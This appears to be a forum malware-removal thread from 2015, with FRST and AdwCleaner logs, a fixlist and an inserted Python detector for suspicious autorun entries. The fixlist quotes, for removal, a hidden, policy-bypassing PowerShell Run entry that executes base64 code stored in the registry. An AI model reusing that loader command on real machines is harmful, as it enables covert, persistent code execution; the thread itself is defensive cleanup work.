2015-11-12 10:42 - 2014-01-18 01:33 - 00000000 ____D C:\Users\user\AppData\Roaming\vlc
2015-11-12 10:36 - 2015-01-25 12:55 - 00000000 ____D C:\ProgramData\GarenaMessenger
2015-11-12 10:35 - 2015-01-25 12:56 - 00000000 ____D C:\Users\user\AppData\Roaming\GarenaPlus
2015-11-12 10:24 - 2013-04-26 02:29 - 32016384 ___SH C:\Users\user\Desktop\Thumbs.db
2015-11-12 10:11 - 2015-09-20 07:47 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-11-12 01:13 - 2015-06-24 04:49 - 00003886 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2015-11-11 10:11 - 2012-10-22 10:06 - 00000000 ____D C:\ProgramData\Skype
2015-11-11 04:56 - 2009-07-14 13:13 - 00794490 _____ C:\Windows\system32\PerfStringBackup.INI
2015-11-10 10:47 - 2013-12-26 04:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Garena
2015-11-09 22:01 - 2015-08-24 07:29 - 00000000 ____D C:\Users\user\AppData\Local\MalwareProtectionLive
2015-11-09 10:00 - 2013-12-12 21:06 - 00065536 _____ C:\Windows\system32\Ikeext.etl
2015-11-09 09:59 - 2009-07-14 13:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-11-07 22:24 - 2015-03-28 09:45 - 00000000 ____D C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2015-11-07 22:24 - 2015-01-25 17:10 - 00000000 ____D C:\Users\user\AppData\Local\CrashDumps
2015-11-06 22:52 - 2015-08-27 02:42 - 00000000 ____D C:\Users\user\Desktop\DESKTOP FILES
2015-11-06 21:55 - 2015-04-11 22:09 - 00000000 ____D C:\lp2
2015-11-03 19:05 - 2014-03-27 14:21 - 00000000 ____D C:\Users\user\AppData\Local\Microsoft Games
2015-11-03 19:02 - 2015-10-06 12:45 - 00000000 ____D C:\Users\user\Desktop\The Sims 1 Setup(to install)
2015-11-02 14:46 - 2014-05-06 00:49 - 00006656 _____ C:\Users\user\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
 
==================== Files in the root of some directories =======
 
2013-06-15 21:40 - 2015-01-25 07:52 - 0424299 _____ () C:\Program Files (x86)\Yahoo Messenger.exe
2014-06-15 16:30 - 2014-06-15 16:30 - 0000000 _____ () C:\Users\user\AppData\Roaming\bitlord_log.txt
2015-02-11 00:14 - 2015-02-11 00:15 - 0161280 _____ () C:\Users\user\AppData\Roaming\LolChecker3L.exe
2014-03-25 15:15 - 2014-09-28 07:26 - 0045270 _____ () C:\Users\user\AppData\Roaming\room_v3.dat
2015-03-24 05:40 - 2015-03-24 05:40 - 0000095 _____ () C:\Users\user\AppData\Roaming\settings.xml
2014-04-25 04:27 - 2014-04-25 04:27 - 0000038 ___SH () C:\Users\user\AppData\Local\1754111884ee9ab5277ca00.95260103
2014-05-06 00:49 - 2015-11-02 14:46 - 0006656 _____ () C:\Users\user\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-06-15 20:44 - 2014-06-15 20:44 - 0000218 _____ () C:\Users\user\AppData\Local\recently-used.xbel
2015-01-25 10:10 - 2015-01-28 16:11 - 0007605 _____ () C:\Users\user\AppData\Local\resmon.resmoncfg
2015-06-24 22:20 - 2015-06-24 22:20 - 0000000 _____ () C:\Users\user\AppData\Local\{0FB02795-135A-4FDE-B93F-90D379995679}
2013-03-08 16:34 - 2014-02-20 23:49 - 0000056 ____H () C:\ProgramData\ezsidmv.dat
2014-04-30 09:53 - 2010-11-20 20:17 - 72545408 ___SH () C:\ProgramData\mscmcnfo.exe
 
Files to move or delete:
====================
C:\ProgramData\mscmcnfo.exe
 
 
Some files in TEMP:
====================
C:\Users\user\AppData\Local\Temp\04daeb573ce62afa7555cd2e25adad9a.dll
C:\Users\user\AppData\Local\Temp\8b2451c9a3b319e7acdadb60680c5536.dll
C:\Users\user\AppData\Local\Temp\ab493e4f04f5854a2b514ead2208eeaf.dll
C:\Users\user\AppData\Local\Temp\ab5e31d07b6ea746979d10d903f463d5.dll
C:\Users\user\AppData\Local\Temp\cdo1027532841.dll
C:\Users\user\AppData\Local\Temp\cdo1570732038.dll
C:\Users\user\AppData\Local\Temp\cdo1596866374.dll
C:\Users\user\AppData\Local\Temp\cdo1654477641.dll
C:\Users\user\AppData\Local\Temp\cdo1741655092.dll
C:\Users\user\AppData\Local\Temp\cdo1782642798.dll
C:\Users\user\AppData\Local\Temp\cdo1933995910.dll
C:\Users\user\AppData\Local\Temp\cdo2321098618.dll
C:\Users\user\AppData\Local\Temp\cdo2341346200.dll
C:\Users\user\AppData\Local\Temp\cdo2743754581.dll
C:\Users\user\AppData\Local\Temp\cdo27712066.dll
C:\Users\user\AppData\Local\Temp\cdo2935743010.dll
C:\Users\user\AppData\Local\Temp\cdo3059789971.dll
C:\Users\user\AppData\Local\Temp\cdo3104791633.dll
C:\Users\user\AppData\Local\Temp\cdo3332709131.dll
C:\Users\user\AppData\Local\Temp\cdo3557932323.dll
C:\Users\user\AppData\Local\Temp\cdo3694628903.dll
C:\Users\user\AppData\Local\Temp\cdo3833933485.dll
C:\Users\user\AppData\Local\Temp\cdo4014789421.dll
C:\Users\user\AppData\Local\Temp\cdo489187832.dll
C:\Users\user\AppData\Local\Temp\cdo699369333.dll
C:\Users\user\AppData\Local\Temp\PH_150602to150616.exe
C:\Users\user\AppData\Local\Temp\PH_150616to150630.exe
C:\Users\user\AppData\Local\Temp\PH_150630to150714.exe
C:\Users\user\AppData\Local\Temp\PH_150714to150724.exe
C:\Users\user\AppData\Local\Temp\PH_150724to150727.exe
C:\Users\user\AppData\Local\Temp\PH_150727to150729.exe
C:\Users\user\AppData\Local\Temp\PH_150729to150807.exe
C:\Users\user\AppData\Local\Temp\PH_150807to150825.exe
C:\Users\user\AppData\Local\Temp\PH_150825to150909.exe
C:\Users\user\AppData\Local\Temp\PH_150909to150917.exe
C:\Users\user\AppData\Local\Temp\PH_150917to150922.exe
C:\Users\user\AppData\Local\Temp\PH_150922to151006.exe
C:\Users\user\AppData\Local\Temp\PH_151103to151112.exe
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2015-11-01 10:14
 
==================== End of FRST.txt ============================




#2 Marnel

Marnel
  • Topic Starter
  • Members
  • 52 posts
  • Gender:Male
  • Location:Philippines

Posted 14 November 2015 - 11:31 PM

Bump



#3 shelf life

shelf life

  • Malware Response Team
  • 2,688 posts
  • Gender:Male
  • Location:@localhost

Posted 15 November 2015 - 10:24 AM

Hi,

A "slow" computer doesn't always mean virus or malware. Please download and run AdwCleaner and we will go from there. Usually only online once or twice per day, so you may not get a reply from me until the following day.

 

Please download AdwCleaner and save it to your desktop.

    http://www.bleepingcomputer.com/download/adwcleaner/

    Right-click AdwCleaner.exe and select "run as admin"
    Accept the disclaimer
    Click on the Scan button.
    Once the scan is done, click the Clean button
    Press OK when asked to close all programs and follow the onscreen prompts.
    Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
    After rebooting, a logfile report (AdwCleaner[S#].txt) will open automatically
    Copy and paste the contents of that logfile in your next reply.
    A copy of that logfile will also be saved in the C:\AdwCleaner folder.

 

Next we will use FRST. Please copy/paste what's below into Notepad. Save it as fixlist.txt in the same location you have FRST. Start FRST like before, except this time click on the Fix button once. Machine may reboot to finish. Upon reboot you will find a fixlog.txt in the same location as FRST. Please post the fixlog.txt in your reply.

2015-06-24 22:20 - 2015-06-24 22:20 - 0000000 _____ () C:\Users\user\AppData\Local\{0FB02795-135A-4FDE-B93F-90D379995679}
2013-03-08 16:34 - 2014-02-20 23:49 - 0000056 ____H () C:\ProgramData\ezsidmv.dat
2014-04-30 09:53 - 2010-11-20 20:17 - 72545408 ___SH () C:\ProgramData\mscmcnfo.exe
C:\ProgramData\mscmcnfo.exe
BHO: Browser Extensions -> {34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5} -> C:\Users\user\AppData\Roaming\BrowserExtensions\Coupons64.dll [2015-06-09] ()
HKLM\...\Policies\Explorer\Run: [1024412975] => C:\ProgramData\mscmcnfo.exe [72545408 2010-11-20] ()
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [Browser Extensions] => C:\Users\user\AppData\Roaming\BrowserExtensions\BEHelper.exe [540656 2015-06-09] ()
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [Settings Manager] => C:\Users\user\AppData\Roaming\Settings Manager\SettingsManager.EXE [969840 2015-11-03] ()
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [{33D7074C-563D-4D69-875F-595D51FBE7FC}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AhgetfWU').QlGpriXvmdmWTi)));
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [UM] => C:\Users\user\AppData\Roaming\Update Manager\UM.EXE [806064 2015-11-10] ()
EmptyTemp:

How Can I Reduce My Risk to Malware?
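The last Run entry in the fixlist above is the one worth understanding: a hidden, policy-bypassing powershell.exe that decodes a base64 blob out of an HKCU\Software\Classes value and executes it in memory, so there is no file on disk for a scanner to flag. As an added example (not part of this thread, FRST, or AdwCleaner), here is a Python checker that parses FRST-style autorun lines and reports those traits. The regex, the trait list, the severity rules and the benign first sample line are my own constructions; the other three sample lines are copied from the log.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input in the FRST autorun format used by the fixlist above.
# The first line is an invented benign entry; the other three are copied from the log.
SAMPLE_FRST_LINES = [
    r"HKLM\...\Run: [ExampleUpdater] => C:\Program Files\Example\updater.exe [123456 2015-01-01] (Example Vendor Inc.)",
    r"HKLM\...\Policies\Explorer\Run: [1024412975] => C:\ProgramData\mscmcnfo.exe [72545408 2010-11-20] ()",
    r"HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [Settings Manager] => C:\Users\user\AppData\Roaming\Settings Manager\SettingsManager.EXE [969840 2015-11-03] ()",
    r"HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [{33D7074C-563D-4D69-875F-595D51FBE7FC}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AhgetfWU').QlGpriXvmdmWTi)));",
]

# <hive>\...\<key>: [<value name>] => <command> [<size> <date>] (<publisher>)
# The trailing size/date/publisher block is absent for script-style entries.
AUTORUN_RE = re.compile(
    r"^(?P<hive>.+?)\\\.\.\.\\(?P<key>[^:]+): \[(?P<name>[^\]]*)\] => (?P<cmd>.*?)"
    r"(?: \[(?P<size>\d+) (?P<date>\d{4}-\d{2}-\d{2})\] \((?P<publisher>[^)]*)\))?$"
)

# Traits of a registry-resident PowerShell loader, matched against the lowercased command.
POWERSHELL_TRAITS = {
    "-windowstyle hidden": "hidden window",
    "-executionpolicy bypass": "execution policy bypass",
    "iex": "Invoke-Expression of generated code",
    "frombase64string": "base64-encoded payload",
    "hkcu:\\software\\classes": "payload stored in the registry (not on disk)",
}

@dataclass
class Finding:
    name: str
    hive: str
    key: str
    severity: str
    reasons: list = field(default_factory=list)

def parse_autorun(line):
    """Return the fields of one FRST autorun line, or None if it is not one."""
    m = AUTORUN_RE.match(line.strip())
    return m.groupdict() if m else None

def assess(entry):
    """Score one parsed entry as 'clean', 'medium' or 'high' and list the reasons."""
    low = entry["cmd"].lower()
    reasons = []
    if "powershell" in low:
        reasons += [why for trait, why in POWERSHELL_TRAITS.items() if trait in low]
    # FRST prints () when the binary carries no publisher/signature information.
    if entry["publisher"] == "" and re.search(r"\\(programdata|appdata)\\", low):
        reasons.append("unsigned binary in a user-writable directory")
    if "policies\\explorer\\run" in entry["key"].lower():
        reasons.append("uses the less common Policies\\Explorer\\Run key")
    if re.fullmatch(r"\{[0-9a-f-]{36}\}|\d{6,}", entry["name"], re.I):
        reasons.append("random-looking value name")
    if not reasons:
        severity = "clean"
    elif any("payload" in r for r in reasons):
        severity = "high"  # in-memory loader: nothing on disk for a file scanner to find
    else:
        severity = "medium"
    return Finding(entry["name"], entry["hive"], entry["key"], severity, reasons)

def scan(lines):
    """Parse and assess every autorun line, skipping lines from other FRST sections."""
    entries = (parse_autorun(line) for line in lines)
    return [assess(e) for e in entries if e]
```

Running `scan(SAMPLE_FRST_LINES)` rates the two unsigned ProgramData/AppData binaries medium and the encoded PowerShell entry high; the registry key named in that command is the real payload location, which is why the fixlist removes the Run value rather than a file.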


#4 Marnel

Marnel
  • Topic Starter
  • Members
  • 52 posts
  • Gender:Male
  • Location:Philippines

Posted 15 November 2015 - 07:39 PM

Hey, thank you for replying.

 

AdwCleaner[S#]:

# AdwCleaner v5.021 - Logfile created 16/11/2015 at 08:28:48
# Updated 14/11/2015 by Xplode
# Database : 2015-11-13.3 [Server]
# Operating system : Windows 7 Ultimate Service Pack 1 (x64)
# Username : user - BAUTISTA
# Running from : C:\Users\user\Desktop\AdwCleaner.exe
# Option : Scan
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
Folder Found : C:\Program Files (x86)\GreenTree Applications
Folder Found : C:\ProgramData\ytd video downloader
Folder Found : C:\ProgramData\{c22796e6-2c6d-f246-c227-796e62c65b98}
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ytd video downloader
Folder Found : C:\users\user\AppData\Local\MalwareProtectionLive
Folder Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen
Folder Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcfenmboojpjinhpgggodefccipikbpd
Folder Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cekonfccladjgbdhpgobceahgjdcdbod
Folder Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cekonfccladjgbdhpgobceahgjdcdbod
Folder Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hjnhcgkngeeahimbfhejeaiijecekhba
Folder Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\jloeihbcjbkgigodmcacomgfihpiaiip
Folder Found : C:\users\user\AppData\Roaming\OpenCandy
Folder Found : C:\users\user\AppData\Roaming\Settings Manager
Folder Found : C:\users\user\AppData\Roaming\RHEng
Folder Found : C:\users\user\AppData\Roaming\BrowserExtensions
Folder Found : C:\users\user\AppData\Roaming\Update Manager
Folder Found : C:\users\user\AppData\Roaming\BitLord
Folder Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\Extensions\{c2fc3c2b-a65a-453c-bf95-101fde56ed1d}
Folder Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\Extensions\{d3b9472c-f8b1-4a10-935b-1087bac8417f}
Folder Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\Extensions\{c2fc3c2b-a65a-453c-bf95-101fde56ed1d}
Folder Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\Extensions\{2bc72c53-9bde-4db2-8479-eda9a5e71f4e}
Folder Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\Extensions\{c2fc3c2b-a65a-453c-bf95-101fde56ed1d}
Folder Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\Extensions\{d3b9472c-f8b1-4a10-935b-1087bac8417f}
 
***** [ Files ] *****
 
File Found : C:\Users\Public\Desktop\YTD Video Downloader.lnk
File Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_kbfnbcaeplbcioakkpcpgfkobkghlhen_0.localstorage
File Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_kbfnbcaeplbcioakkpcpgfkobkghlhen_0.localstorage-journal
File Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cekonfccladjgbdhpgobceahgjdcdbod
File Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cekonfccladjgbdhpgobceahgjdcdbod
File Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hjnhcgkngeeahimbfhejeaiijecekhba
File Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_jloeihbcjbkgigodmcacomgfihpiaiip_0.localstorage
File Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_jloeihbcjbkgigodmcacomgfihpiaiip_0.localstorage-journal
File Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jloeihbcjbkgigodmcacomgfihpiaiip
File Found : C:\users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Malware Protection Live.lnk
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\searchplugins\yahoo_ff.xml
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\searchplugins\yahoo_ff.xml
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\searchplugins\yahoo_ff.xml
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\user.js
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\user.js
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\user.js
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\il1dvo6n.default\searchplugins\yahoo_ff.xml
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\il1dvo6n.default\searchplugins\yahoo_ff.xml
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\il1dvo6n.default\searchplugins\yahoo_ff.xml
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\il1dvo6n.default\user.js
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\il1dvo6n.default\user.js
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\il1dvo6n.default\user.js
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wjavt8eh.default-1389747203138\searchplugins\yahoo_ff.xml
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wjavt8eh.default-1389747203138\searchplugins\yahoo_ff.xml
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wjavt8eh.default-1389747203138\searchplugins\yahoo_ff.xml
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wjavt8eh.default-1389747203138\user.js
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wjavt8eh.default-1389747203138\user.js
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wjavt8eh.default-1389747203138\user.js
 
***** [ DLL ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Registry ] *****
 
Value Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [Browser Extensions]
Value Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [MalwareProtectionLive]
Value Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION [BackgroundHost.exe]
Value Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_WEBOC_MOVESIZECHILD [BackgroundHost.exe]
Key Found : HKLM\SOFTWARE\Classes\AppID\{4D076AB4-7562-427A-B5D2-BD96E19DEE56}
Key Found : HKLM\SOFTWARE\Classes\AppID\{9C81D00A-3DAA-48AB-90C7-8252119ABB93}
Key Found : HKLM\SOFTWARE\Classes\AppID\{1DA17428-323D-48FF-857C-98CFEE48BFD5}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{826D7151-8D99-434B-8540-082B8C2AE556}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{3CCC052E-BDEE-408A-BEA7-90914EF2964B}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{61F47056-E400-43D3-AF1E-AB7DFFD4C4AD}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{E2B98EEA-EE55-4E9B-A8C1-6E5288DF785A}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{D879A501-50A7-BEFC-A4C5-32DC6E0CB208}
Key Found : HKLM\SOFTWARE\Classes\Interface\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8FFE}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{11549FE4-7C5A-4C17-9FC3-56FC5162A994}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5}
Value Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}]
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8FFE}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{50F60937-910A-4C05-8E36-FE4E299191CF}
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5}
Key Found : HKCU\Software\InstallCore
Key Found : HKCU\Software\Linkey
Key Found : HKCU\Software\WEBAPP
Key Found : HKCU\Software\AppDataLow\Software\Settings Manager
Key Found : HKCU\Software\AppDataLow\Software\Browser Extensions
Key Found : HKLM\SOFTWARE\PositiveFinds
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{3A787631-66A2-4634-B928-A37E73B58FB6}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Settings Manager
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1a413f37-ed88-4fec-9666-5c48dc4b7bb7}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MalwareProtectionLive
Data Found : HKCU\Software\Microsoft\Internet Explorer\Main [Start Page] - hxxps://ph.search.yahoo.com/?type=715483&fr=spigot-yhp-ie
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{26314958-A633-434B-84F0-AFD107022F56}
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{3E9AC06D-F60A-4990-AD1C-ACB860F40AE0}
Data Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] - {3E9AC06D-F60A-4990-AD1C-ACB860F40AE0}
 
***** [ Web browsers ] *****
 
[C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\prefs.js] [Preference] Found : user_pref("browser.startup.homepage", "hxxps://ph.search.yahoo.com/?type=715483&fr=spigot-yhp-ff");
[C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\prefs.js] [Preference] Found : user_pref("keyword.URL", "hxxps://ph.search.yahoo.com/search?fr=greentree_ff1&ei=utf-8&ilc=12&type=715483&p=");
[C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\prefs.js] [Preference] Found : user_pref("startpage.ntsearch_url", "hxxps://ph.search.yahoo.com/search?fr=spigot-nt-ff&ei=utf-8&ilc=12&type=715483&p={searchTerms}");
[C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\il1dvo6n.default\prefs.js] [Preference] Found : user_pref("keyword.URL", "hxxps://ph.search.yahoo.com/search?fr=greentree_ff1&ei=utf-8&ilc=12&type=715483&p=");
[C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\il1dvo6n.default\prefs.js] [Preference] Found : user_pref("browser.startup.homepage", "hxxps://ph.search.yahoo.com/?type=715483&fr=spigot-yhp-ff");
[C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wjavt8eh.default-1389747203138\prefs.js] [Preference] Found : user_pref("keyword.URL", "hxxps://ph.search.yahoo.com/search?fr=greentree_ff1&ei=utf-8&ilc=12&type=715483&p=");
[C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wjavt8eh.default-1389747203138\prefs.js] [Preference] Found : user_pref("browser.startup.homepage", "hxxps://ph.search.yahoo.com/?type=715483&fr=spigot-yhp-ff");
[C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Found : cekonfccladjgbdhpgobceahgjdcdbod
[C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Found : cekonfccladjgbdhpgobceahgjdcdbod
[C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Found : fcfenmboojpjinhpgggodefccipikbpd
[C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Found : fpmeembnagmagppkgghhfjfdfajdfcah
[C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Found : hjnhcgkngeeahimbfhejeaiijecekhba
[C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Found : jloeihbcjbkgigodmcacomgfihpiaiip
[C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Found : kbfnbcaeplbcioakkpcpgfkobkghlhen
 
########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [11971 bytes] ##########
 
 
 
fixlog.txt: 
 
Fix result of Farbar Recovery Scan Tool (x64) Version:07-11-2015
Ran by user (2015-11-16 08:35:20) Run:1
Running from C:\Users\user\Desktop
Loaded Profiles: user (Available Profiles: user)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
2015-06-24 22:20 - 2015-06-24 22:20 - 0000000 _____ () C:\Users\user\AppData\Local\{0FB02795-135A-4FDE-B93F-90D379995679}
2013-03-08 16:34 - 2014-02-20 23:49 - 0000056 ____H () C:\ProgramData\ezsidmv.dat
2014-04-30 09:53 - 2010-11-20 20:17 - 72545408 ___SH () C:\ProgramData\mscmcnfo.exe
C:\ProgramData\mscmcnfo.exe
BHO: Browser Extensions -> {34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5} -> C:\Users\user\AppData\Roaming\BrowserExtensions\Coupons64.dll [2015-06-09] ()
HKLM\...\Policies\Explorer\Run: [1024412975] => C:\ProgramData\mscmcnfo.exe [72545408 2010-11-20] ()
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [Browser Extensions] => C:\Users\user\AppData\Roaming\BrowserExtensions\BEHelper.exe [540656 2015-06-09] ()
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [Settings Manager] => C:\Users\user\AppData\Roaming\Settings Manager\SettingsManager.EXE [969840 2015-11-03] ()
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [{33D7074C-563D-4D69-875F-595D51FBE7FC}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AhgetfWU').QlGpriXvmdmWTi)));
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [UM] => C:\Users\user\AppData\Roaming\Update Manager\UM.EXE [806064 2015-11-10] ()
EmptyTemp:
*****************
 
C:\Users\user\AppData\Local\{0FB02795-135A-4FDE-B93F-90D379995679} => moved successfully
C:\ProgramData\ezsidmv.dat => moved successfully
Could not move "C:\ProgramData\mscmcnfo.exe" => Scheduled to move on reboot.
Could not move "C:\ProgramData\mscmcnfo.exe" => Scheduled to move on reboot.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5} => key not found. 
